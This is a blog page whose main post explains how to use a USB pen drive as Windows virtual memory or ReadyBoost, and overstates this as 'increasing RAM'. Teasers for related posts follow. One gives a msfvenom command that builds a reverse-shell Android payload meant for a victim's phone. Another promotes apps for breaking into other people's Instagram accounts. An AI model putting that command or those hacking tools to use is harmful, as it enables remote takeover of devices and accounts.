Skip to main content

How to Increase your PC RAM using Pendrive.

How to Increase your PC RAM using Pendrive.

I know it’s old trick, but some people are still not aware of it.one of my friend asked me today.As you all know what is a basic functionality of RAM on our PC/Laptop as the more RAM means MORE speed and faster your system’s speed. For gaming purpose, one needs more RAM. What if you don’t have enough money to buy new RAM and also sometimes there is no extra slot on your motherboard to setup new RAM. so,try this awesome way to extend your ram.


#1 Method: Virtual Ram Concept For Windows
Step 1. First of all Insert Your Pen Drive. Then open My Computer and Right click > Then open Properties.
Step 2. Now Properties window will appear, then click on Advanced system settings from a left side.
Step 3. Then in Advanced Tab click on Settings Button appear in Performance tab.
Step 4.  Again new window will appear then click on Advanced Tab.
Step 5.  In Advanced Tab there is an option of the Virtual Memory box, Then click on Change Button.
Virtual Ram Concept For Windows
Step 6. Now uncheck the box of Automatically Manage Page size feature. Then in Custom Size Add Your Pen Drive current same in below format. Now Add same Value in both boxes and click on Apply button.
Virtual Ram Concept For Windows
Note: If Your Pen Drive is of Size 4Gb then always add 10Mb less from currently available size. As I am using pen drive of size 4Gb and current space available is 3700 Mb then use 3690 minimum approx or remove more as you can because of it better of device safety.
Restart Your PC or Laptop and Now pen drive work as Virtual Ram. If you face problem in above method then can also follow below method which is easy to perform and work on Window 7, 8
#2 Method: Using ReadyBoost In Windows 7, 8, 10
Step 1. Firstly Insert your Pen Drive > Now Right click on your pen drive and Open Properties
Step 2. Now you need to browse to ReadyBoost Tab.
Step 3. Then switch to Use this device and reduce your current memory space. If your current device place is 4100MB, then reduce it with approx 200-300MB.
Step 4. Then click on Apply button and all Done.
Step 5. In case if you want to change back your pen drive to normal then switch it back Don’t use a device in ReadyBoost tab.
Important Recommendations:
1. Always Safely Eject Your Pen Drive. Direct remove removal may lead to device damage.
2. In Virtual Memory method If you want to convert back your Pen into Normal Then Again open Virtual Settings And Remove custom memory value and choose Default settings by checking Automatically Manage Paging Size.
3. In ReadyBoost Method don’t forget to revert to normal or otherwise open your pen drive and delete Readyboost file from your pen drive.
It will be very helpful to you if you have a pen drive.
Posted by Nagesh ;)

Comments

Popular posts from this blog

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...